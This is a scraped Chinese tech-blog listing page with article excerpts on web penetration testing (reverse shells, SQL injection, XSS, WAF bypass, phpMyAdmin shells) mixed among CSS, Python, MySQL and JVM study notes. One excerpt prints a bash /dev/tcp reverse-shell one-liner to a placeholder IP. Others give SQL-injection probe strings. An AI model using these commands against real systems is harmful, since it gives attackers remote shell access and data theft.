E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
web渗透笔记总结
Kali(渗透工具):25---攻击性手动
Web渗透
测试框架TIDoS-Framework
免责声明:TIDoS是作为攻击性Web应用程序审核框架提供的。它具有内置模块,可以揭示Web应用程序中可能被恶意利用的潜在错误配置和漏洞。因此,对于此工具包引起的任何误用或损害,作者和其他贡献者概不负责。一、下载与安装前提:您需要将Python版本默认为2.x。但是,从Python2到Python3的迁移工作已经在进行中①全局安装下载使用下面的命令下载gitclonehttps://github.
江南、董少
·
2020-07-29 11:23
Kali(渗透工具)
【Linux_Kali网络渗透测试学习
笔记总结
(三)】服务枚举
网络渗透测试(三):服务枚举服务枚举是一种数据采集工作,用于获取目标主机开放端口,操作系统和网络服务等有关信息端口扫描,及其端口扫描工具所支持的扫描类型端口扫描工具枚举Windows系统SMB服务的扫描工具枚举SNMP服务的扫描工具枚举虚拟专用网络(VirtualPrivateNetwork)的扫描工具目标枚举的目的是最大程度地收集目标主机的网络服务信息,为我们后续阶段的识别漏洞工作做了前提铺垫文
数据库爆破专家
·
2020-07-29 11:21
安全_网络渗透
【网络安全】从零开始的CTF生活
题目主要包含逆向、漏洞挖掘与利用、
Web渗透
、密码、取证、隐写、安全编程等类别2、攻防模式(Attack-Defense):参赛队伍在网络空间互相进行攻
小哈里
·
2020-07-29 10:17
Web渗透
中的反弹Shell与端口转发的奇淫技巧
奇淫技巧0x00前言在做渗透测试时,遇到linux服务器,直观想到反弹shell到本地进行溢出等提权尝试,⽽而其中涉及到的反弹/转发/代理的种种方式,就在此文做一简单小结.0x01反弹shell1)Bash部分linux发行版中的Bash可以直接反弹一个shell到指定ip端口bash-i>&/dev/tcp/x.x.x.x/23330>&12)NetCatNetcat反弹shell也是常用兵器,
大方子
·
2020-07-29 10:01
技术分享
CSS---学习
笔记总结
在做项目时,总是被css样式困扰,系统的梳理下:css---层叠样式表语法:内联样式:样式写在标签对中,一般很少使用,尽量不要写在标签内,不利于代码维护。内部样式:将样式集中写在head标签对中,适用于一个页面。外部样式:将所有样式放在一个或多个.css为扩展名的外部样式表文件中,通过标签将样式链接到HTML文档中。Document#div1{width:100px;height:100px;ba
maidu_xbd
·
2020-07-29 10:02
CSS
JQuery菜鸟教程
笔记总结
JQuery语法jQuery语法是通过选取HTML元素,并对选取的元素执行某些操作基础语法:$(selector).action()美元符号定义jQuery选择符(selector)”查询”和”查找”HTML元素jQuery的action()执行对元素的操作-$(this).hide()-隐藏当前元素-$("p.test").hide()-隐藏所有class="test"的元素JQuery选择器j
逍遥绝情
·
2020-07-29 10:52
JQuery
学习
笔记总结
1)私有属性和方法:私有属性,只能在类的内部方法中访问。如何私有化:在属性名或方法名的前面,添加‘__’符号如果要访问私有的方法和属性:需要提供一个非私有(公共函数)的方法来访问或修改属性值。2)继承:原则:子类从父类中继承所有属性和方法,在访问父类的方法:1、super().方法名()2、在父类的方法中,可以通过self来访问子类中的属性【前提:实例化子类对象】2、在子类的构造函数中,调用父类的
codingroom
·
2020-07-29 09:28
Python课程总结
HTML学习
笔记总结
HTML学习01目录,资料,工具,规范HTML学习01目录,资料,工具,规范本文格式规范在线文档查询老师个人网站课程录播百度网盘02基础标签网页标准模板font标签span标签p标签a标签图片的相对路径-relative图片的绝对路径-absolute标签页内锚记,锚点定位特殊字符表示pre标签,这个标签内可以输入各种原生文字!!上标下标marquee标签03重要的图片标签-img图片的格式知识排
PhilRobin
·
2020-07-29 09:21
html
html
css
提高篇-广度优先搜索BFS-《算法笔记》同步
笔记总结
与补充
bfs算法比较高效,由于需要使用队列容器,可能会导致运行速度不太乐观可解问题:bfs适合解决最少步数的问题。一维跳棋八数码问题迷宫最小步数专题要点:在使用bfs时,思考方式从节点存储的数据、边界、入队的节点(哪些节点入队)、状态压缩、状态转移、判重这几方面入手。节点:bfs大多需要节点存储其所在的层数step(即步数),队首元素的step+1即为当前节点的step,然后入队。除此之外可根据题意存储
九筒-
·
2020-07-29 07:15
算法笔记
渗透测试之信息收集(上篇)
强调安全不简单强调防御,而应该从攻击者的角度,思考安全,所以
web渗透
测试犹为重要,即“未知攻,焉之防”。既然是攻击者的角度思考防御,那么攻击的手段是多种多样的。
碧血照丹心
·
2020-07-29 07:45
信息收集
Web渗透
信息收集篇
信息收集主要是收集服务器的配置信息和网站的敏感信息,主要包括域名信息、子域名信息、目标网站信息、目标网站真实IP、目录文件、开放端口和服务、中间件信息、脚本语言等等等。结合各路大佬的收集经验,菜鸟总结了8种信息收集的方式,有不足之处,欢迎赐教,欢迎斧正。个人感觉重点是顺手的工具、有IP代理池、日常收集的强大的字典、清晰可见的思维导图和多次的实战经验。一收集域名信息1.whois查询whois(读作
爱上卿Ooo
·
2020-07-29 05:23
信息安全
网络信息收集
web渗透
测试之信息收集
目录信息收集一.域名信息搜集1.域名介绍2.whois介绍3.whois作用4.whois查询方式二.子域名信息搜集1.子域名介绍2.子域名搜集的作用2.子域名搜集方法三.web站点信息搜集1.CMS指纹识别2.网站敏感目录和文件四.端口信息搜集1.端口介绍2.端口信息搜集方法3.常见端口攻击五.敏感信息搜集1.敏感信息搜集的必要性2.搜索的基本方式六.真实IP地址搜集1.CDN介绍2.判断CDN
黑是黑客的黑
·
2020-07-29 05:01
Python 中的自省与反射
这是一个引流帖,个人技术博客网址请访问BYA’sBlog或直接搜索框输入http://bya.cool里面目前主要分享一些关于Python基础&进阶、Linux、golang、echarts可视化、主题阅读等
笔记总结
_小白大侠_
·
2020-07-29 04:27
Python
web渗透
测试中WAF绕过讲解(一)
---恢复内容开始---0x01前言许多Hacker总是生存在与WAF的不断抗争之中的,厂商不断过滤,Hacker不断的骚操作绕过。WAF与Hacker总是在斗智斗勇,经过长时间的发展,近年越来越多的Hacker投入到与WAF进行对抗,相对应的绕过方法也被大量的暴露出来,笔者今日就先进行个小小的科普先来说说WAF是什么。0x02什么是WAF?简单的来说它是一个Web应用程序防火墙他的功能是执行一系
ZDH5362
·
2020-07-29 04:46
caffe 训练
笔记总结
1序言本文主要是自己平时训练参数调整的总结,后续也不断的完善,由于以前训练调参过程中,没有总结总是忘记的参数,这个也自己备忘,如有错误或者引用不当,欢迎指正。Lastmodifieddate:2019-03-012优化器caffe总共提供了六种优化方法:StochasticGradientDescent(type:“SGD”),AdaDelta(type:“AdaDelta”),AdaptiveG
守枫竹清
·
2020-07-29 01:23
CV
JAVA多线程基础实验编码及学习
笔记总结
关于多线程的基础知识和相关概念,以及编程时可能会出现的问题参见我之前的两个博客Java多线程和操作系统多线程关系操作系统中进程和线程的概念理解多线程基础实验importThreads.*;publicclassMain{publicstaticvoidmain(String[]args){/***简单的Thread类使用*sleep()使得当前线程休眠nms*start()使得该线程开始工作(并不
AtThePeak
·
2020-07-29 01:31
Java编程
web渗透
--19--跨站脚本攻击(XSS)
1、漏洞名称存储型XSS跨站脚本,反射型XSS跨站脚本2、漏洞描述跨站脚本攻击的英文全称是CrossSiteScript,为了和样式表区分,缩写为XSS。发生的原因是网站将用户输入的内容输出到页面上,在这个过程中可能有恶意代码被浏览器执行。跨站脚本攻击它指的是恶意攻击者往Web页面里插入恶意JavaScript代码,当用户浏览该页之时,嵌入其中Web里面的JavaScript代码会被执行,从而达到
随 亦
·
2020-07-28 23:58
web渗透
web安全
渗透测试
OWASP安全测试
WEB渗透
之SQL盲注
漏洞等级:高漏洞风险:会使攻击者远程查看、修改或删除数据库内条目和表单N-Base分类:远程命令执行----SQL注入漏洞描述:SQL注入是一种WEB程序的漏洞,通过注射,攻击者可以获得数据库中存储的数据,造成机密数据的外泄。SQL注入攻击(SQLinjection),是发生于应用程序至数据库层的安全漏洞。简而言之,是在输入的数据字符串之中夹带SQL指令,在安全不达标的程序中,开发者忽略了检查,那
沙漠网管
·
2020-07-28 22:23
WEB安全
2017-2018-2 20155303『网络对抗技术』Final:
Web渗透
获取WebShell权限
2017-2018-2『网络对抗技术』Final:
Web渗透
获取WebShell权限————————CONTENTS————————一.Webshell原理1.什么是WebShell2.WebShell
weixin_33711647
·
2020-07-28 17:19
SQL
以下
笔记总结
自网络教程。SQL简介SQL指结构化查询语言SQL是一种ANSI的标准计算机语言,存在不同的版本,但不同版本都支持一些共同的关键词。SQL语法一个数据库通常包含一个或多个表。
wepon_
·
2020-07-28 13:19
数据库
2018-3-11银行家培训
笔记总结
关键词:银行家、目标、教练沟通技术、财务自由、量化一、准备自我介绍:你是谁?来自哪里?从事什么工作?现金流游戏给你的启发与收获是什么?参加银行家培训的目的是什么?每一个问题都蕴含深意。二、银行家最关键意义、作用与准则:1、]讲解规则2、维持秩序3、]避免对抗4、点评点累积5、3*玩家人数的神经元刺激即成长机会标准:带领着玩过的人下次还想来玩。三、银行家点评技巧1、金鱼哲学:表扬优点,如果……是不是
王丽丽_0804
·
2020-07-28 13:44
WEB渗透
SQL注入【3】[access数据库注入](2)
SQL注入的分类很多,不同的人也会将注入分成不同的种类,下面笔者将介绍一下常见的分类。注意:此文章中标点符号在页面中显示可能会转成中文的,自己测试时候语句中的标点一律使用英文输入法状态下的。1、判断注入:select*fromproductwhereid=1406and1=1//真条件页面正常select*fromproductwhereid=1406and1=2//假条件返回空select*fr
司徒荆
·
2020-07-28 12:16
web渗透
web渗透
【7】XSS跨站脚本漏洞详解(1)
目录一、XSS漏洞基础讲解二、JavaScript基础知识三、XSS分类一、XSS漏洞基础讲解XSS介绍:跨站脚本攻击(CrossSiteScripting),为了不和层叠样式表(CascadingStyleSheets,CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意的Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶
司徒荆
·
2020-07-28 12:16
web渗透
web渗透
【11】phpmyadmin写shell的三种方法
查看phpMyAdmin能否自定义导出文件目录的权限 showglobalvariableslike"%secure%"; //查询secure_file_priv配置secure_file_prive=null//不允许导入导出数据到目录secure_file_priv=c:\\www//允许导入导出数据到指定目录secure_file_priv=''//允许导入导出数据到任意目录secur
司徒荆
·
2020-07-28 12:16
web渗透
渗透测试职业规划-三省吾身
1.熟悉
web渗透
测试步骤、方法、流程,具备独立开展渗透工作的能力2.熟悉主流Web框架,熟悉代码
white-night
·
2020-07-28 11:33
灰色是最美的颜色
紫书 第10章 数学概念与方法
紫书上第十章的例题刷了有一半了,相关知识也学了学,但总感觉忘得很快,水一水博客,把自己的
笔记总结
一下,顺便清理一下收藏夹,哈哈哈。
mianing
·
2020-07-28 10:12
笔记
Redis深入浅出
笔记总结
1.redis五种数据类型和消息订阅1、RedisString数据结构简介:String是最常用的一种数据类型,普通的key/value存储都可以归为此类1、set/get1)设置key对应的值为String类型的value2)获取key对应的值2、mget批量获取多个key的值,如果可以不存在则返回nil3、incr&&incrbyincr对key对应的值进行加加操作,并返回新的值;incrby
喜欢粉红的糙汉
·
2020-07-28 08:23
有了这份MySQL调优笔记,再也不怕面试官的拷问了(附Java岗面试题)
今天这份最全的MySQL调优
笔记总结
,助你向大厂“开炮”,面试不再被MySQL
Java程序猿小七
·
2020-07-28 03:34
java
面试
数据结构
MySQL
笔记总结
一、sql基础1.sql执行顺序2.七种join内连接(两者交集)select*fromtableAainnerjointableBbona.key=b.key;左外连接(左表a独有部分加上两者交集,独有部分对应另一个表字段为null)select*fromtableAaleftjointableBbona.key=b.key;左连接(左表a独有部分)select*fromtableAaleftj
lzj1005642974
·
2020-07-28 03:15
笔记总结--数据库
工具类
·
web渗透
测试-从入门到放弃-03暴力破解验证码绕过
不安全的验证码客户端绕过我们先输入一个正确的验证码,然后回到burpsuite看有无抓包发现,burpsuite没有抓到包,然后,输入正确的验证码,发现burpsuite抓到了数据包它这里提交了账号、码和验证码。我们再来看看页面的源码,看看它这个验证码验证是不是在前端做的,在页面右键,查看页面源代码。拖动到最下面900多行的时候,发现有一段js的代码。可以看到,所有验证码的逻辑是通过js代码生成的
精神小火子
·
2020-07-28 03:41
Web安全
mybatis源码学习(自用)
所以非常想养成学习过后记录
笔记总结
的习惯。这篇就当作我笔记的开始吧。以后看情况会对一些技术框架做一个总结。
km56558
·
2020-07-28 01:18
mybatis
Java基础
笔记总结
(16)-IO流 File类练习题
获取文件夹的长度privatestaticLonggetFileLength(Filefile){longlen=0;File[]subLists=file.listFiles();for(FilesubFile:subLists){if(subFile.isFile()){len+=subFile.length();}else{len+=getFileLength(subFile);}}retu
吵吵先生
·
2020-07-28 00:54
Hibernate学习
笔记总结
(三)——Hibernate 3.x——HQL查询语言(重点)
Hibernate3.x——HQL查询语言示例:Hibernate3_10_HQLHibernate查询:数据查询与检索是Hibernate中的一个亮点。相对其他ORM实现而言,Hibernate提供了灵活多样的查询机制。标准化对象查询(CriteriaQuery):以对象的方式进行查询,将查询语句封装为对象操作。优点:可读性好,符合Java程序员的编码习惯。缺点:不够成熟,不支持投影(proje
huazi889198
·
2020-07-27 23:14
Hibernate
计算机系统课程
笔记总结
CSAPP第二章 信息的表示和处理(2.3-2.4)
GitHub计算机系统CSAPP课程资源计算机系统课程
笔记总结
CSAPP第二章信息的表示和处理(2.1-2.2)计算机系统课程
笔记总结
CSAPP第二章信息的表示和处理(2.3-2.4)计算机系统课程
笔记总结
頔潇
·
2020-07-27 22:21
计算机系统
【Kali
Web渗透
测试】手动漏洞挖掘—SQL注入 猜测数据库列名、表名、库名、字段内容
1.列名、表名、库名'anduserisnull--+'andtable.userisnull--+'anddb.table.userisnull--+用burp截获httpGET请求,发送到repeater,变量加$,load字典(字典可从kali中获取(find/-name*column*.txt))'and(selectcount(*)fromtable)>0--+//猜数据库里其它的表2.
Dalvin_jean
·
2020-07-27 21:27
SQL注入
CSS学习
笔记总结
篇【精心收藏】
第八章css基础知识css基础知识:css样式表的定义css:(CascadingStyleSheets)层叠样式表;分类及位置:内部样式-head区域style标签里面外部样式-link调用内联样式-标签元素里面css内的注释:/*注释内容*/css样式表的语法CSS规则由两个主要的部分构成:要添加样式的盒子名或者标签名、和要添加的样式。盒子名或者标签名{属性:值;}CSS中几种颜色的表示方法用
dingzhui2715
·
2020-07-27 21:54
MySQL中一条查询语句的前生今世
最近在读丁奇大佬的《MySQL实战45讲》,收获很大,所以准备跟着写一点
笔记总结
。MySQL结构总览上面是MySQL的逻辑架构图,由它可见MySQL大致分为Sever层和存储引擎层。
CodeYuan-Y
·
2020-07-27 17:36
数据库
MySQL中一条查询语句的前生今世
最近在读丁奇大佬的《MySQL实战45讲》,收获很大,所以准备跟着写一点
笔记总结
。MySQL结构总览上面是MySQL的逻辑架构图,由它可见MySQL大致分为Sever层和存储引擎层。
小勇勇
·
2020-07-27 17:26
mysql
sql
数据库
10-16
笔记总结
函数(方法)关键字:function声明式函数,又叫函数的声明functiontest(){语句}表达式函数vartest=function(){语句}vartest=newFunction();-重复声明一个函数,后面的函数会覆盖前面的.-return返回值,没有return的时候,返回为undefined.-函数的属性:name:函数名/length:返回参数的个数匿名函数的调用(functi
Mr_Jasper
·
2020-07-27 16:34
个人笔记
函数
10-19
笔记总结
10-19
笔记总结
window对象(bom对象)window对象是所有对象的顶层对象document使我们可以从脚本中,对HTML页面中所有元素进行访问history访问过的URLlocation包含有关当前
Mr_Jasper
·
2020-07-27 16:34
个人笔记
第九章and第十章Java
笔记总结
大全
文章目录接口接口·概念接口定义接口的设计模式java的异常处理异常类Exception类及其子类Error类及其子类try...catch多重catch代码块的用法finally子句的用法使用throws关键字抛出异常使用throw关键字抛出异常throw和throws不同点使用异常处理语句的注意事项自定义异常如何创建和自定义异常?接口接口·概念接口由若干常量定义和一组抽象方法组成,接口中不包括变
程序与English
·
2020-07-27 15:54
vuex 学习
笔记总结
实例代码:https://gitee.com/linzhifen5/vuexStudy原理:1.使用webpack创建一个项目2.进入项目目录,使用npminstall安装依赖,使用npminstallvuex--save命令安装vuex到本地,在项目的src目录下新建一个目录store,文件夹下创建index.js文件,在index.js文件中创建vuex实例,并引入vue和vuex:3.进入m
清风细雨_林木木
·
2020-07-27 13:08
vuex
MySQL
笔记总结
数据库:本质上就是一个文件系统.通过标准的sql对数据进行curd操作安装数据库管理系统:数据库管理系统大白话就是一个软件常见的关系型数据库:关系型数据库:存放实体与实体之间的关系的数据库(就是二维表)实体:用户订单商品关系:用户拥有订单订单包含商品非关系型数据库:存放的是对象(redis)NO-sql(notonlysql)软件名厂商特点mysqloracle开源的数据库oracleoracle
Kunaly
·
2020-07-27 12:46
数据库
笔记丶
JAVA
effective java (第二版)目录与原则
回头
笔记总结
,并且会更新。第1章引言这章主要说了面向人群,规则场景,本书的关注点,内容用了什么术语等等。
进击的小鹿
·
2020-07-27 12:33
UVM和System verilog
笔记总结
UVM是一个方法,是一个平台。UVM-1.2平台提供了:uvm_test/env/sequence/sequencer/driver/monitor/agent、base/comp/tlm/seq/ral/'uvm_fatal/error/warning/info/object_utils/component_utils(extends使用时需要注册)uvm_port/socket/sequenc
Starterman
·
2020-07-26 22:49
笔记
芯片
模拟电子线路复习笔记( 六) —— 集成运算放大器原理及其运用
模拟电子线路复习笔记(六)——集成运算放大器原理及其运用本文是对模电的第六章的集成运算放大器原理及其运用知识点的
笔记总结
。全文手写,附有例题解析,帮助加深理解。1.知识点总结2.习题解析
XDU_flow
·
2020-07-22 17:16
模拟电子线路复习笔记
经验分享
leetcode
笔记总结
最近几个月,因为小勇娃的缘故,也跟着一块学习算法,组队学算法,真香٩(๑>◡<๑)۶。虽然是计算机毕业的,但是好多东西也忘光了。。把基础的数据结构慢慢过一遍,每周刷几道算法,成功提交的喜悦溢于言表(开心(^o^)/),长久下来对自己思考问题也有很大的提升吧,坚持坚持!由于在印象笔记做这部分的笔记比较多,就直接分享链接啦,希望大家共同学习,一起进步!所刷算法题部分汇总:题目名称总结链接两数之和htt
宝妞儿
·
2020-07-22 14:48
2018-8-1晨间日记
纪念日:任务清单昨日完成的任务,最重要的三件事:1、读书
笔记总结
2、学习统计(这个算没有完成)3、少量阅读改进:昨天有所松懈,八月不能再有。
班瑞
·
2020-07-16 06:37
JVM知识点
笔记总结
1.Java内存区域与内存溢出异常运行时数据区:主要分为线程私有和线程共享两大块。线程私有(生命周期与线程相同,共生死):Java虚拟机栈(NativeStack)本地方法栈(VMStack)程序计数器(PC)线程共享(生命周期与JVM相同):堆(heap)方法区(Methodarea,逻辑分开,物理属于堆)程序计数器:是一块较小的内存空间,它可以看作是当前线程所执行的字节码的行号指示器.记录正在
Wim同学
·
2020-07-16 06:14
Java虚拟机
10.5 Trie字典树和简单模式匹配
10.5Trie字典树和简单模式匹配Tip:本博客内容是通过学习慕课网bobo老师视频做的
笔记总结
,不用于任何商业用途,只用于帮助更多技术爱好者。
Drogon Brother
·
2020-07-16 02:27
数据结构
上一页
34
35
36
37
38
39
40
41
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他